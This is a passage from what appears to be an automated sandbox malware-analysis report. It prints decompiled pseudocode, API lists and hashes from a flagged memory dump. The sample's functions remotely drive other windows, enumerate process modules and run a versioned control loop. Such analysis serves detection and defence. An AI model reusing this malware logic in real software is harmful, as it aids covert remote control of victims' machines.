					_t132 = SendMessageW(_t142, 0x84, 0, _t158) + 1;
					if(_t132 > 0x15) {
						goto L3;
					}
					_t35 = _t132 + 0x4eb73ec; // 0x4040404
					switch( *((intOrPtr*)(( *_t35 & 0x000000ff) * 4 +  &M04EB73D8))) {
						case 0:
							SetWindowLongA(_t142, 0xfffffff0, GetWindowLongA(_t142, 0xfffffff0) | 0x08000000);
							SendMessageW(_t142, 0x84, 0, _t158);
							goto L3;
						case 1:
							PostMessageW(__ebx, 0x112, 0xf020, 0);
							goto L3;
						case 2:
							_v320.length = 0x2c;
							GetWindowPlacement(__ebx,  &_v320);
							_push(0);
							if((_v320.flags & 0x00000003) == 0) {
								PostMessageW(__ebx, 0x112, 0xf030, ??);
							} else {
								PostMessageW(__ebx, 0x112, 0xf120, ??);
							}
							goto L3;
						case 3:
							PostMessageW(__ebx, 0x10, 0, 0);
							goto L3;
						case 4:
							goto L3;
					}
				} else {
					_v356.x =  *(__ecx + 0x74);
					_t139 =  *(__ecx + 0x78);
					_push(_t139);
					_v356.y = _t139;
					_t142 = WindowFromPoint( *(__ecx + 0x74));
					L2:
					_t158 = _a12;
					L3:
					ScreenToClient(_t142,  &_v356);
					_push(_v356.y);
					_t167 = ChildWindowFromPoint(_t142, _v356.x);
					if(_t167 == 0) {
						L7:
						if(_v360 != 0) {
							_t158 = (_v356.y & 0x0000ffff) << 0x00000010 | _v356.x & 0x0000ffff;
						}
						_push(_t158);
						_push(_a8);
						_push(_a4);
						_push(_t142);
						L10:
						PostMessageW();
						L11:
						return E04ED572E(_v8 ^ _t178);
					}
					asm("o16 nop [eax+eax]");
					while(_t167 != _t142) {
						_t142 = _t167;
						ScreenToClient(_t167,  &_v356);
						_push(_v356.y);
						_t167 = ChildWindowFromPoint(_t167, _v356);
						if(_t167 != 0) {
							continue;
						}
						goto L7;
					}
					goto L7;
				}
			}






































                                                                                    0x04eb6fc6
                                                                                    0x04eb6fcc
                                                                                    0x04eb6fd3
                                                                                    0x04eb6fe5
                                                                                    0x04eb6fed
                                                                                    0x04eb6fef
                                                                                    0x04eb6ff6
                                                                                    0x04eb70a4
                                                                                    0x04eb70aa
                                                                                    0x04eb70ad
                                                                                    0x04eb70b3
                                                                                    0x04eb70b4
                                                                                    0x04eb70b6
                                                                                    0x04eb70be
                                                                                    0x04eb70c2
                                                                                    0x04eb70c6
                                                                                    0x04eb70ca
                                                                                    0x04eb70cd
                                                                                    0x04eb70d6
                                                                                    0x04eb70d8
                                                                                    0x04eb70e0
                                                                                    0x04eb71b8
                                                                                    0x04eb72c1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb72c7
                                                                                    0x04eb72ca
                                                                                    0x04eb72d0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb72e2
                                                                                    0x04eb72e8
                                                                                    0x04eb72ec
                                                                                    0x04eb72fe
                                                                                    0x04eb7302
                                                                                    0x04eb730a
                                                                                    0x04eb730e
                                                                                    0x04eb7311
                                                                                    0x04eb7316
                                                                                    0x04eb73c2
                                                                                    0x04eb73cc
                                                                                    0x00000000
                                                                                    0x04eb73cc
                                                                                    0x04eb731c
                                                                                    0x00000000
                                                                                    0x04eb7333
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb737c
                                                                                    0x04eb737f
                                                                                    0x04eb7381
                                                                                    0x04eb738a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb73c0
                                                                                    0x04eb73c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb733e
                                                                                    0x04eb7350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb7374
                                                                                    0x04eb7378
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb7395
                                                                                    0x04eb7399
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb7369
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb739f
                                                                                    0x04eb73a3
                                                                                    0x04eb73aa
                                                                                    0x04eb73b1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb73bc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb731c
                                                                                    0x04eb71c5
                                                                                    0x04eb71d2
                                                                                    0x04eb71da
                                                                                    0x04eb71e0
                                                                                    0x04eb71f5
                                                                                    0x04eb7212
                                                                                    0x04eb7217
                                                                                    0x04eb7225
                                                                                    0x04eb7235
                                                                                    0x04eb723d
                                                                                    0x04eb7297
                                                                                    0x04eb729d
                                                                                    0x04eb72a6
                                                                                    0x04eb72b4
                                                                                    0x04eb72b4
                                                                                    0x00000000
                                                                                    0x04eb72a6
                                                                                    0x04eb7247
                                                                                    0x04eb724d
                                                                                    0x04eb7251
                                                                                    0x04eb7260
                                                                                    0x04eb7264
                                                                                    0x04eb7279
                                                                                    0x04eb7285
                                                                                    0x00000000
                                                                                    0x04eb7285
                                                                                    0x04eb71f7
                                                                                    0x04eb71f9
                                                                                    0x04eb71fb
                                                                                    0x04eb7200
                                                                                    0x00000000
                                                                                    0x04eb7200
                                                                                    0x04eb70ec
                                                                                    0x04eb70f3
                                                                                    0x04eb7101
                                                                                    0x04eb7105
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb710b
                                                                                    0x04eb7112
                                                                                    0x00000000
                                                                                    0x04eb712b
                                                                                    0x04eb713a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb7166
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb7171
                                                                                    0x04eb717b
                                                                                    0x04eb718b
                                                                                    0x04eb718d
                                                                                    0x04eb71ac
                                                                                    0x04eb718f
                                                                                    0x04eb719a
                                                                                    0x04eb719a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb714d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6ffc
                                                                                    0x04eb6fff
                                                                                    0x04eb7003
                                                                                    0x04eb7006
                                                                                    0x04eb700a
                                                                                    0x04eb7014
                                                                                    0x04eb7016
                                                                                    0x04eb7016
                                                                                    0x04eb7019
                                                                                    0x04eb701f
                                                                                    0x04eb7025
                                                                                    0x04eb7034
                                                                                    0x04eb7038
                                                                                    0x04eb7067
                                                                                    0x04eb706c
                                                                                    0x04eb707b
                                                                                    0x04eb707b
                                                                                    0x04eb707d
                                                                                    0x04eb707e
                                                                                    0x04eb7081
                                                                                    0x04eb7084
                                                                                    0x04eb7085
                                                                                    0x04eb7085
                                                                                    0x04eb708b
                                                                                    0x04eb70a1
                                                                                    0x04eb70a1
                                                                                    0x04eb703a
                                                                                    0x04eb7040
                                                                                    0x04eb7048
                                                                                    0x04eb704c
                                                                                    0x04eb7052
                                                                                    0x04eb7061
                                                                                    0x04eb7065
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb7065
                                                                                    0x00000000
                                                                                    0x04eb7040

                                                                                    APIs
                                                                                    • WindowFromPoint.USER32(?,?), ref: 04EB700E
                                                                                    • ScreenToClient.USER32 ref: 04EB701F
                                                                                    • ChildWindowFromPoint.USER32 ref: 04EB702E
                                                                                    • ScreenToClient.USER32 ref: 04EB704C
                                                                                    • ChildWindowFromPoint.USER32 ref: 04EB705B
                                                                                    • PostMessageW.USER32(00000000,?,?,?), ref: 04EB7085
                                                                                    • WindowFromPoint.USER32 ref: 04EB70D0
                                                                                    • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 04EB70FF
                                                                                    • GetWindowLongA.USER32 ref: 04EB711C
                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 04EB712B
                                                                                    • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 04EB713A
                                                                                    • GetWindowPlacement.USER32(00000000,?), ref: 04EB717B
                                                                                    • FindWindowA.USER32 ref: 04EB71CC
                                                                                    • GetWindowRect.USER32 ref: 04EB71DA
                                                                                    • PtInRect.USER32(?,00000001,00000001), ref: 04EB71ED
                                                                                    • RealGetWindowClassA.USER32(00000000,?,00000104), ref: 04EB7225
                                                                                    • lstrcmpA.KERNEL32(?,#32768), ref: 04EB7235
                                                                                    • SendMessageW.USER32(00000000,000001E1,00000000,00000000), ref: 04EB7247
                                                                                    • MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 04EB725A
                                                                                    • GetMenuItemID.USER32(00000000,00000000), ref: 04EB7264
                                                                                    • PostMessageW.USER32(00000000,000001E5,00000000,00000000), ref: 04EB7279
                                                                                    • PostMessageW.USER32(00000000,00000100,0000000D,00000000), ref: 04EB7285
                                                                                    • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 04EB7297
                                                                                    • GetWindowRect.USER32 ref: 04EB72EC
                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 04EB7333
                                                                                    • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 04EB7350
                                                                                    • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04EB7369
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 04EB738A
                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04EB73B1
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 04EB73CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$Message$Move$FromPoint$Send$PostRect$ChildClientItemLongMenuScreen$ClassFindPlacementReallstrcmp
                                                                                    • String ID: #32768$,$Button
                                                                                    • API String ID: 4148729706-3823977346
                                                                                    • Opcode ID: 7094301abf9a49e5439b3214486582f7ca609cef57ba31ee408ff4df99c30971
                                                                                    • Instruction ID: 220414fda662110b323bdf235ee3d7a07bd5bafe4556d0ac576fbd8a22c4b9c9
                                                                                    • Opcode Fuzzy Hash: 7094301abf9a49e5439b3214486582f7ca609cef57ba31ee408ff4df99c30971
                                                                                    • Instruction Fuzzy Hash: ACB18C71204301BFD7218FA5DC49FABBBA8EBC8715F005A19F995A3681D774EC04DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC47F0, Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 281stringmemoryprocessCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 87%
                                                                                    			E04EC47F0(void* __ecx, void* __eflags, WCHAR* _a4) {
				void* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				struct tagPROCESSENTRY32W _v32;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t105;
				WCHAR* _t106;
				WCHAR* _t107;
				WCHAR* _t108;
				struct tagPROCESSENTRY32W _t110;
				int _t126;
				int _t127;
				int _t128;
				int _t129;
				int _t130;
				signed short* _t178;
				signed int _t179;
				signed int _t185;
				WCHAR* _t186;
				void* _t187;
				void* _t188;
				WCHAR* _t189;
				void* _t192;
				signed int _t195;
				WCHAR* _t196;
				WCHAR* _t197;
				intOrPtr* _t198;
				struct tagPROCESSENTRY32W _t201;
				void* _t203;
				void* _t205;
				void* _t207;
				struct tagPROCESSENTRY32W _t208;
				WCHAR* _t209;
				void* _t210;
				long _t218;
				long _t219;
				void* _t222;
				void* _t224;
				void* _t226;
				void* _t228;
				void* _t230;
				void* _t231;
				void* _t233;
				void* _t239;

				_t239 = __eflags;
				_t187 = __ecx;
				_t210 = LocalAlloc(0x40, 0x400);
				_v12 = 1;
				_push(0x208);
				_v8 = _t210;
				 *_t210 = 0x81;
				_t105 = E04ED5785(_t187, _t210, _t239);
				_push(0x208);
				_t186 = _t105;
				_t106 = E04ED5785(_t187, _t210, _t239);
				_push(0x208);
				_v16 = _t106;
				_t107 = E04ED5785(_t187, _t210, _t239);
				_push(0x208);
				_v20 = _t107;
				_t108 = E04ED5785(_t187, _t210, _t239);
				_push(0x28);
				_v24 = _t108;
				_v28 = E04ED5785(_t187, _t210, _t239);
				_t110 = E04ED5744(_t210, _t239, 0x428);
				_t231 = _t230 + 0x18;
				_t208 = _t110;
				_v32 = _t208;
				 *_t208 = 0x428;
				_t188 = CreateToolhelp32Snapshot(0x18, _a4);
				_v36 = _t188;
				if(_t188 != 0xffffffff) {
					if(Module32FirstW(_t188, _t208) != 0) {
						_t10 = _t208 + 0x20; // 0x20
						_t209 = _t208 + 0x220;
						_a4 = _t10;
						do {
							if( *_t209 != 0x3f005c || _t209[2] != 0x5c003f) {
								_t189 = _t209;
								_t198 = L"\\SystemRoot";
								_t210 = 0x12;
								while(1) {
									__eflags =  *_t189 -  *_t198;
									if( *_t189 !=  *_t198) {
										goto L16;
									}
									_t189 =  &(_t189[2]);
									_t198 = _t198 + 4;
									_t210 = _t210 - 4;
									__eflags = _t210;
									if(_t210 >= 0) {
										continue;
									} else {
										__eflags =  *_t189 -  *_t198;
										if( *_t189 ==  *_t198) {
											wsprintfW(_t186, L"C:\\WINDOWS%s", _v32 + 0x24c);
											_t231 = _t231 + 0xc;
											_t197 = _t186;
											_t207 = _t209 - _t186;
											asm("o16 nop [eax+eax]");
											do {
												_t185 =  *_t197 & 0x0000ffff;
												_t197 =  &(_t197[1]);
												 *(_t207 + _t197 - 2) = _t185;
												__eflags = _t185;
											} while (_t185 != 0);
										}
									}
									goto L16;
								}
							} else {
								_t178 = _v32 + 0x230;
								_t203 = _t186 - _t178;
								do {
									_t195 =  *_t178 & 0x0000ffff;
									_t178 =  &(_t178[1]);
									 *(_t203 + _t178 - 2) = _t195;
								} while (_t195 != 0);
								_t196 = _t186;
								_t205 = _t209 - _t186;
								asm("o16 nop [eax+eax]");
								do {
									_t179 =  *_t196 & 0x0000ffff;
									_t196 =  &(_t196[1]);
									 *(_t205 + _t196 - 2) = _t179;
								} while (_t179 != 0);
							}
							L16:
							E04EC5D90(_t186, _t209, _v16, _t209, _t210, _v20, _v24);
							asm("xorps xmm0, xmm0");
							_t233 = _t231 + 8;
							asm("movups [eax], xmm0");
							asm("movups [eax+0x10], xmm0");
							asm("movq [eax+0x20], xmm0");
							E04EC4730(_t209, _v28, _t210);
							_t126 = lstrlenW(_t209);
							_t127 = lstrlenW(_v28);
							_t128 = lstrlenW(_v24);
							_t129 = lstrlenW(_v20);
							_t130 = lstrlenW(_v16);
							_t218 = _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _v12 + 0x14;
							if(LocalSize(_v8) >= _t218) {
								_t192 = _v8;
							} else {
								_t192 = LocalReAlloc(_v8, _t218, 0x42);
								_v8 = _t192;
							}
							_t201 = _v32;
							_t219 = _v12;
							 *((intOrPtr*)(_t219 + _t192)) =  *((intOrPtr*)(_t201 + 0x14));
							 *((intOrPtr*)(_t219 + _t192 + 4)) =  *((intOrPtr*)(_t201 + 0x18));
							_v12 = _t219 + 8;
							E04EDDC90(_v8 + _v12, _a4, 2 + lstrlenW(_t201 + 0x20) * 2);
							_t222 = _v12 + 2 + lstrlenW(_a4) * 2;
							E04EDDC90(_v8 + _t222, _t209, 2 + lstrlenW(_t209) * 2);
							_t224 = _t222 + lstrlenW(_t209) * 2 + 2;
							E04EDDC90(_v8 + _t224, _v16, 2 + lstrlenW(_v16) * 2);
							_t226 = _t224 + lstrlenW(_v16) * 2 + 2;
							E04EDDC90(_v8 + _t226, _v20, 2 + lstrlenW(_v20) * 2);
							_t228 = _t226 + lstrlenW(_v20) * 2 + 2;
							E04EDDC90(_v8 + _t228, _v24, 2 + lstrlenW(_v24) * 2);
							_t210 = _t228 + lstrlenW(_v24) * 2 + 2;
							E04EDDC90(_v8 + _t210, _v28, 2 + lstrlenW(_v28) * 2);
							_t231 = _t233 + 0x48;
							_v12 = _t210 + (lstrlenW(_v28) + 1) * 2;
						} while (Module32NextW(_v36, _v32) != 0);
						_t210 = _v8;
						_t208 = _v32;
					}
					CloseHandle(_v36);
				}
				E04ED573F(_t186);
				E04ED573F(_v16);
				E04ED573F(_v20);
				E04ED573F(_v24);
				E04ED573F(_v28);
				_push(0x428);
				E04ED5777(_t208);
				return LocalReAlloc(_t210, _v12, 0x42);
			}





















































                                                                                    0x04ec47f0
                                                                                    0x04ec47f0
                                                                                    0x04ec4806
                                                                                    0x04ec4808
                                                                                    0x04ec480f
                                                                                    0x04ec4814
                                                                                    0x04ec4817
                                                                                    0x04ec481a
                                                                                    0x04ec481f
                                                                                    0x04ec4824
                                                                                    0x04ec4826
                                                                                    0x04ec482b
                                                                                    0x04ec4830
                                                                                    0x04ec4833
                                                                                    0x04ec4838
                                                                                    0x04ec483d
                                                                                    0x04ec4840
                                                                                    0x04ec4845
                                                                                    0x04ec4847
                                                                                    0x04ec4854
                                                                                    0x04ec4857
                                                                                    0x04ec485c
                                                                                    0x04ec485f
                                                                                    0x04ec4861
                                                                                    0x04ec4867
                                                                                    0x04ec4875
                                                                                    0x04ec4877
                                                                                    0x04ec487d
                                                                                    0x04ec488d
                                                                                    0x04ec4893
                                                                                    0x04ec4896
                                                                                    0x04ec489c
                                                                                    0x04ec48a0
                                                                                    0x04ec48a6
                                                                                    0x04ec48f2
                                                                                    0x04ec48f4
                                                                                    0x04ec48f9
                                                                                    0x04ec4900
                                                                                    0x04ec4902
                                                                                    0x04ec4904
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec4906
                                                                                    0x04ec4909
                                                                                    0x04ec490c
                                                                                    0x04ec490c
                                                                                    0x04ec490f
                                                                                    0x00000000
                                                                                    0x04ec4911
                                                                                    0x04ec4914
                                                                                    0x04ec4917
                                                                                    0x04ec4928
                                                                                    0x04ec4930
                                                                                    0x04ec4933
                                                                                    0x04ec4935
                                                                                    0x04ec4937
                                                                                    0x04ec4940
                                                                                    0x04ec4940
                                                                                    0x04ec4943
                                                                                    0x04ec4946
                                                                                    0x04ec494b
                                                                                    0x04ec494b
                                                                                    0x04ec4940
                                                                                    0x04ec4917
                                                                                    0x00000000
                                                                                    0x04ec490f
                                                                                    0x04ec48b1
                                                                                    0x04ec48b6
                                                                                    0x04ec48bb
                                                                                    0x04ec48c0
                                                                                    0x04ec48c0
                                                                                    0x04ec48c3
                                                                                    0x04ec48c6
                                                                                    0x04ec48cb
                                                                                    0x04ec48d2
                                                                                    0x04ec48d4
                                                                                    0x04ec48d6
                                                                                    0x04ec48e0
                                                                                    0x04ec48e0
                                                                                    0x04ec48e3
                                                                                    0x04ec48e6
                                                                                    0x04ec48eb
                                                                                    0x04ec48f0
                                                                                    0x04ec4950
                                                                                    0x04ec495b
                                                                                    0x04ec4963
                                                                                    0x04ec4966
                                                                                    0x04ec496d
                                                                                    0x04ec4970
                                                                                    0x04ec4974
                                                                                    0x04ec4979
                                                                                    0x04ec497f
                                                                                    0x04ec498a
                                                                                    0x04ec4995
                                                                                    0x04ec49a0
                                                                                    0x04ec49ab
                                                                                    0x04ec49c9
                                                                                    0x04ec49d3
                                                                                    0x04ec49e8
                                                                                    0x04ec49d5
                                                                                    0x04ec49e1
                                                                                    0x04ec49e3
                                                                                    0x04ec49e3
                                                                                    0x04ec49eb
                                                                                    0x04ec49ee
                                                                                    0x04ec49f4
                                                                                    0x04ec49fa
                                                                                    0x04ec4a04
                                                                                    0x04ec4a22
                                                                                    0x04ec4a36
                                                                                    0x04ec4a4e
                                                                                    0x04ec4a63
                                                                                    0x04ec4a7d
                                                                                    0x04ec4a94
                                                                                    0x04ec4aae
                                                                                    0x04ec4ac5
                                                                                    0x04ec4adf
                                                                                    0x04ec4af3
                                                                                    0x04ec4b10
                                                                                    0x04ec4b15
                                                                                    0x04ec4b2b
                                                                                    0x04ec4b34
                                                                                    0x04ec4b3c
                                                                                    0x04ec4b3f
                                                                                    0x04ec4b3f
                                                                                    0x04ec4b45
                                                                                    0x04ec4b45
                                                                                    0x04ec4b4c
                                                                                    0x04ec4b54
                                                                                    0x04ec4b5c
                                                                                    0x04ec4b64
                                                                                    0x04ec4b6c
                                                                                    0x04ec4b71
                                                                                    0x04ec4b77
                                                                                    0x04ec4b91

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Local$Alloc$Module32$CloseCreateFirstHandleNextSizeSnapshotToolhelp32wsprintf
                                                                                    • String ID: C:\WINDOWS%s$\SystemRoot
                                                                                    • API String ID: 671652143-1245600093
                                                                                    • Opcode ID: 78c3acba6b88d1de3a1acdd3605645aeb0a856caa341940e88ef6eafb1d8569a
                                                                                    • Instruction ID: 300f6afd1acc2d0c90b178388c1964f99a14cba0cc5eaf98ab483260b0a16b44
                                                                                    • Opcode Fuzzy Hash: 78c3acba6b88d1de3a1acdd3605645aeb0a856caa341940e88ef6eafb1d8569a
                                                                                    • Instruction Fuzzy Hash: 67B1B071E00119EFCF00EFA4DD49AAEBBB5FF84309F104068E915E7251EB35A912DB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECB280, Relevance: 45.9, APIs: 22, Strings: 4, Instructions: 385sleepstringthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 80%
                                                                                    			E04ECB280(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				short _v204;
				char _v208;
				char _v308;
				char _v309;
				intOrPtr _v315;
				char _v316;
				signed int _v320;
				char _v340;
				char _v380;
				char _v512;
				void _v516;
				intOrPtr _v520;
				signed short* _v524;
				void* _v529;
				void* _v536;
				int _v540;
				signed int _v544;
				intOrPtr _v548;
				void* _v549;
				signed int _v552;
				signed int _t113;
				void* _t115;
				void* _t117;
				long _t122;
				void* _t129;
				signed int _t135;
				signed int _t138;
				long _t150;
				void* _t152;
				signed int _t158;
				void* _t166;
				signed int _t167;
				void* _t173;
				long _t174;
				void* _t179;
				intOrPtr _t181;
				signed int _t184;
				signed int _t186;
				void* _t187;
				void* _t189;
				signed int _t199;
				char* _t206;
				void* _t208;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				signed int _t229;
				signed int _t236;
				void* _t242;
				intOrPtr _t245;
				void* _t246;
				long _t250;
				void* _t252;
				void* _t254;
				signed int _t258;
				signed int _t260;
				void* _t261;
				void* _t263;
				void* _t264;

				_t264 = __eflags;
				_t231 = __edi;
				_t260 = (_t258 & 0xfffffff8) - 0x22c;
				_t113 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t113 ^ _t260;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t115 = E04ECA980();
				_v536 = 0;
				_t242 = _t115;
				_v540 = 0;
				E04EC9360(__ebx,  &_v544, __edi, _t242, _t264, L"Control");
				if(_v544 != 0 || _t242 != 0 && _v544 != 0) {
					_t117 = _v536;
					__eflags = _t117;
					if(_t117 != 0) {
						CloseHandle(_t117);
					}
					goto L69;
				} else {
					SetErrorMode(1);
					_t122 = GetTickCount();
					wsprintfA( &_v316, "Global\\%d%d", GetTickCount(), _t122);
					_t261 = _t260 + 0x10;
					_t268 = _t242;
					if(_t242 != 0) {
						CloseHandle(CreateThread(0, 0, E04ECBCE0, 0, 0, 0));
						if(E04EBE850(CloseHandle, _t231, CreateThread, _t268) > 0) {
							CloseHandle(CreateThread(0, 0, E04EBE6B0, 0, 0, 0));
						}
					}
					E04EBA330();
					_t199 = 0;
					_v552 = 0;
					while(1) {
						L7:
						_t129 = memcpy( &_v516, 0x4f05318, 0x31 << 2);
						_t261 = _t261 + 0xc;
						asm("movsw");
						_t271 = _t129;
						if(_t129 == 0) {
							_t189 = E04ED5744(0x4f05318, _t271, 0x3c);
							_t261 = _t261 + 4;
							_t129 = E04EB62B0(_t199, _t189, 0x4f0537a, _t271);
							 *0x4f068d0 = _t129;
						}
						if( *((intOrPtr*)(_t129 + 0x38)) != 0) {
							memcpy( &_v516, 0x4f053de, 0x31 << 2);
							_t261 = _t261 + 0xc;
							asm("movsw");
						}
						_t245 = 0;
						_v548 = 0;
						if((_v320 & 0x0000ffff) + 1 == 0) {
							break;
						}
						_t236 = _v552;
						do {
							if(_t236 != 0) {
								E04EB8C80(_t236);
								_t142 =  *(_t236 + 0x50);
								if( *(_t236 + 0x50) != 0) {
									E04ED573F(_t142);
									_t261 = _t261 + 4;
								}
								 *(_t236 + 0x58) = 0;
								 *(_t236 + 0x50) = 0;
								 *(_t236 + 0x54) = 0;
								 *((intOrPtr*)(_t236 + 0x30)) = 0x4efcf88;
								 *((intOrPtr*)(_t236 + 0x28)) = 0x4efd008;
								_t143 =  *((intOrPtr*)(_t236 + 0x1c));
								if( *((intOrPtr*)(_t236 + 0x1c)) != 0) {
									E04ED573F(_t143);
									_t261 = _t261 + 4;
								}
								_push(0x60);
								E04ED5777(_t236);
								_t261 = _t261 + 8;
								_t236 = 0;
								_v552 = 0;
							}
							if(_t199 != 0) {
								 *((intOrPtr*)( *_t199))(1);
								_t199 = 0;
							}
							if(_t245 != 0) {
								E04ECB090(_t199,  &_v204, _t236, _t245,  &_v380,  &_v340);
								_t261 = _t261 + 8;
								goto L26;
							} else {
								_t208 = 0;
								asm("o16 nop [eax+eax]");
								do {
									_t138 =  *(_t261 + _t208 + 0x38) & 0x0000ffff;
									_t208 = _t208 + 2;
									 *(_t261 + _t208 + 0x166) = _t138;
								} while (_t138 != 0);
								L26:
								_t135 = 0;
								_v544 = 0;
								do {
									_t246 =  &_v516;
									_t247 = _t246 + _t135 * 2;
									_v524 = _t246 + _t135 * 2;
									if( *(_t246 + _t135 * 2) == 0) {
										goto L38;
									}
									_t206 =  &_v512;
									_t284 =  *((short*)(_t206 + _t135 * 2));
									_v540 = _t206 + _t135 * 2;
									if( *((short*)(_t206 + _t135 * 2)) == 0) {
										goto L38;
									}
									_t236 = E04ED5744(_t247, _t284, 0x60);
									_v552 = _t236;
									E04EB7970(_t236);
									 *((intOrPtr*)(_t236 + 0x28)) = 0x4efd048;
									 *(_t236 + 0x2c) = 0;
									 *((intOrPtr*)(_t236 + 0x30)) = 0x4efd024;
									 *(_t236 + 0x34) = 0;
									 *(_t236 + 0x58) = 0;
									 *(_t236 + 0x50) = 0;
									 *(_t236 + 0x54) = 0;
									 *(_t236 + 0x40) = 0;
									 *(_t236 + 0x20) = 0;
									 *(_t236 + 0x24) = 0;
									 *(_t236 + 0x38) = 0;
									 *((char*)(_t236 + 0x3c)) = 0x43;
									E04EB8AD0(_t236,  *_t247 & 0x0000ffff);
									_t150 = GetTickCount();
									_t261 = _t261 + 4 - 0xc;
									_t250 = _t150;
									_push( *_v544 & 0x0000ffff);
									_push( &_v208);
									_t152 = E04EB8BA0(_t236);
									_t285 = _t152;
									if(_t152 == 0) {
										L37:
										_t135 = _v544;
										goto L38;
									}
									_v520 = GetTickCount() - _t250;
									_t199 = E04ED5744(_t250, _t285, 0x11c);
									_t263 = _t261 + 4;
									_t251 =  *_v524 & 0x0000ffff;
									_t158 = _v552;
									 *_t199 = 0x4efd8b0;
									 *((intOrPtr*)(_t199 + 4)) = _t158;
									 *(_t158 + 0x38) = _t199;
									 *((intOrPtr*)(_t199 + 8)) = CreateEventW(0, 1, 0, 0);
									_t69 = _t199 + 0xc; // 0xc
									 *_t199 = 0x4efd1a0;
									 *0x4f068d4 =  *_v524 & 0x0000ffff;
									lstrcpyA(_t69,  &_v308);
									lstrcpyW(0x4f068d8,  &_v204);
									_t165 =  *0x4f068d0; // 0x0
									 *0x4f03760 =  *_v540 & 0x0000ffff;
									_t236 = _v552;
									 *(_t199 + 0x118) = 0;
									 *(_t199 + 0x114) = 0;
									 *((char*)(_t199 + 0x110)) = 0;
									 *(_t236 + 0x38) = _t199;
									_t286 = _t165;
									if(_t165 == 0) {
										_t187 = E04ED5744(_t251, _t286, 0x3c);
										_t263 = _t263 + 4;
										 *0x4f068d0 = E04EB62B0(_t199, _t187, _t236, _t286);
									}
									_t216 = _t236;
									_t166 = E04ECAD50(_t199, _t216, _v520, _t236, _t251, 0x4f054a4, L"20211002", L"v2021002",  *((intOrPtr*)(_t165 + 0x30)));
									_t261 = _t263 + 0x10;
									if(_t166 == 0) {
										goto L37;
									} else {
										_t252 = 0;
										while( *((char*)(_t199 + 0x110)) == 0) {
											Sleep(0x3e8);
											_t252 = _t252 + 1;
											if(_t252 < 0x3c) {
												continue;
											}
											if( *((char*)(_t199 + 0x110)) != 0) {
												break;
											}
											goto L37;
										}
										__eflags = _t236;
										if(__eflags == 0) {
											goto L40;
										}
										__eflags = _t199;
										if(__eflags == 0) {
											goto L40;
										}
										_t167 =  *0x4f068d0; // 0x0
										_v316 = 0xa0;
										__eflags = _t167;
										if(__eflags == 0) {
											_t186 = E04ED5744(_t252, __eflags, 0x3c);
											_t261 = _t261 + 4;
											_t216 = _t186;
											_t167 = E04EB62B0(_t199, _t216, _t236, __eflags);
											 *0x4f068d0 = _t167;
										}
										_push(_t216);
										_push(0x3f);
										_v315 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x28)) + 0x14));
										_push(5);
										_push( &_v316);
										E04EB1C60( *((intOrPtr*)(_t199 + 4)));
										do {
											_t173 = OpenEventA(0x1f0003, 0,  &_v309);
